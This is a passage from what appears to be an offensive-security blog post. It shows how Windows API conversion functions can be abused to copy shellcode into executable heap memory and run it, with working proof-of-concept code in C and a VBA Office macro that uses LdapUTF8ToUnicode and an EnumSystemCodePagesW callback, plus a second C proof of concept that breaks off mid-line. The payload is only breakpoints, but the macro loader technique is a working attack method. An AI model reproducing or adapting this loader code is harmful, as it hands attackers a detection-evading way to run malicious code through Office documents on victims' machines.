In an extremely abstract way we can label the functions that can be (ab)used in two labels: one-shot functions and two-shot functions. The first family of functions are those that let you copy the shellcode directly to the desired address (for example, UuidFromStringA used by Lazarus); meanwhile two-shot functions are those where the copy has to be done in two-steps: first copy the shellcode to no man’s land, and then retrieve it (for example, SetEnvironmentVariable/GetEnvironmentVariable)

One-shot functions

Most of the functions falling into this category are functions used to convert info from format β€œA” to format β€œB”, or those applying any type of transformation to this info. This kind of functions can be spotted checking their arguments: if it receives an input buffer and an output buffer, it is a good candidate. Let’s check LdapUTF8ToUnicode for example:

WINLDAPAPI int LDAPAPI LdapUTF8ToUnicode(
  LPCSTR lpSrcStr,
  int    cchSrc,
  LPWSTR lpDestStr,
  int    cchDest
);

So, the parameters are:

lpSrcStr - A pointer to a null-terminated UTF-8 string to convert.
lpDestStr - A pointer to a buffer that receives the converted Unicode string, without a null terminator.

This is a good candidate that meets our criteria. We can test it with a simple PoC in C:

#include <Windows.h>
#include <Winldap.h>

#pragma comment(lib, "wldap32.lib")

int main(int argc, char** argv) {
	LPCSTR orig_shellcode = "\xec\xb3\x8c\xec\xb3\x8c"; // \xcc\xcc\xcc\xcc in UNICODE
	LPWSTR copied_shellcode = NULL;
	HANDLE heap = NULL;
	int ret = 0;
	int size = 0;
	
	heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
	copied_shellcode = HeapAlloc(heap, 0, 0x10);
	size = LdapUTF8ToUnicode(orig_shellcode, strlen(orig_shellcode), NULL, 0); // First call is to know the size
	ret = LdapUTF8ToUnicode(orig_shellcode, strlen(orig_shellcode), copied_shellcode, size);
	EnumSystemCodePagesW(copied_shellcode, 0); // Just to trigger the execution. Taken from Nootrak article.
	return 0;
}

As this function works doing a conversion from UTF-8 to UNICODE, we have to craft our shellcode (in this case just a bunch of int3) keeping this in mind.

Shellcode copied to our target RWX buffer
Shellcode copied to our target RWX buffer.

As we saw, it worked. It is time to translate the C code to the impious language of Mordor VBA:

Private Declare PtrSafe Function HeapCreate Lib "KERNEL32" (ByVal flOptions As Long, ByVal dwInitialSize As LongPtr, ByVal dwMaximumSize As LongPtr) As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "KERNEL32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongPtr) As LongPtr
Private Declare PtrSafe Function EnumSystemCodePagesW Lib "KERNEL32" (ByVal lpCodePageEnumProc As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function LdapUTF8ToUnicode Lib "WLDAP32" (ByVal lpSrcStr As LongPtr, ByVal cchSrc As Long, ByVal lpDestStr As LongPtr, ByVal cchDest As Long) As Long


Sub poc()
    Dim orig_shellcode(0 To 5) As Byte
    Dim copied_shellcode As LongPtr
    Dim heap As LongPtr
    Dim size As Long
    Dim ret As Long
    Dim HEAP_CREATE_ENABLE_EXECUTE As Long
    
    HEAP_CREATE_ENABLE_EXECUTE = &H40000
    
    '\xec\xb3\x8c\xec\xb3\x8c ==> \xcc\xcc\xcc\xcc
    orig_shellcode(0) = &HEC
    orig_shellcode(1) = &HB3
    orig_shellcode(2) = &H8C
    orig_shellcode(3) = &HEC
    orig_shellcode(4) = &HB3
    orig_shellcode(5) = &H8C
    
    heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0)
    copied_shellcode = HeapAlloc(heap, 0, &H10)
    size = LdapUTF8ToUnicode(VarPtr(orig_shellcode(0)), 6, 0, 0)
    ret = LdapUTF8ToUnicode(VarPtr(orig_shellcode(0)), 6, copied_shellcode, size)
    ret = EnumSystemCodePagesW(copied_shellcode, 0)
End Sub

Attach a debugger and run the macro!

Macro executing our shellcode
Macro executing our shellcode.

Another example can be PathCanonicalize:

BOOL PathCanonicalizeA(
  LPSTR  pszBuf,
  LPCSTR pszPath
);

The parameters meets our criteria:

pszBuf - A pointer to a string that receives the canonicalized path. You must set the size of this buffer to MAX_PATH to ensure that it is large enough to hold the returned string.

pszPath -  pointer to a null-terminated string of maximum length MAX_PATH that contains the path to be canonicalized.

The PoC:

#include <Windows.h>
#include <Shlwapi.h>

#pragma comment(lib, "Shlwapi.lib")

int main(int argc, char** argv) {
	LPCSTR orig_shellcode = "\xcc\xcc\xcc\xcc";
	LPSTR copied_shellcode =</